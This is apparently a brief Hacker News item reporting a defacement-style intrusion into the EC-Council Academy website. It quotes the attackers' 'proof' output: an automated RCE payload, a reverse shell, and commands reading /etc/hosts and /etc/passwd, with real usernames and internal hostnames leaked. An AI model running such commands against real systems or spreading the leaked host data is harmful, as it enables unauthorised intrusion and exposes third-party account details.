EC-Council Academy Hacked by GaySec (Malaysian hackers)
The Hacker News
EC-Council Academy (https://eccouncilacademy.org) Hacked by GaySec (Malaysian hackers). EC-Council Academy is a separate distinct company with no corporate connection between itself and EC-Council or EC-Council University. Some months before same site was got hacked by some other hacker. Read here ...


Some Hack Proofs :

[-] Enter Target:
-> www.eccouncilacademy.org
[-] Enter Path:
-> /
[-] Port:
-> 80
[+] Connecting to www.eccouncilacademy.org...
[+] Connected to eccouncilacademy.org
[+] Searching for token...
[+] W000t!! got it! "AMXhybB3FSBDBYJZU"
[+] Convert the token to the RCE Payload
[+] Execute the shell...
[+] Trying...
[+] Got it!!!
-> Reverse Shell Started
$ id; uname -a; pwd
uid=7647041(ecco1665) gid=100450(inetuser) groups=100450(inetuser) context=user_u:system_r:unconfined_t:s0
Linux sg2nlhg017.shr.prod.sin2.secureserver.net 2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686 i686 i386 GNU/Linux
/home/content/41/7647041/html/ECA
$ cat /etc/hosts
127.0.0.1 localhost.localdomain localhost
182.50.132.229 relay-hosting.secureserver.net
72.167.234.199 proxy.shr.secureserver.net
$ cat /etc/passwd
a0180915:*:7724050:100450:a0180915:/home/content/50/7724050:/sbin/nologin
a1005443:*:7550259:100450:a1005443:/home/content/59/7550259:/sbin/nologin
a270895037:*:7706634:100450:a270895037:/home/content/34/7706634:/sbin/nologin
a3818565:*:7625474:100450:a3818565:/home/content/74/7625474:/sbin/nologin
a3de7797:*:8018681:100450:a3de7797:/home/content/81/8018681:/sbin/nologin
a51o9564:*:7752707:100450:a51o9564:/home/content/07/7752707:/sbin/nologin
aadu3620:*:7569984:100450:aadu3620:/home/content/84/7569984:/sbin/nologin
aaimhi:*:8084553:100450:aaimhi:/home/content/53/8084553:/sbin/nologin

Read More : https://gaysec.net/gay/eccouncilacademy.org.txt
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.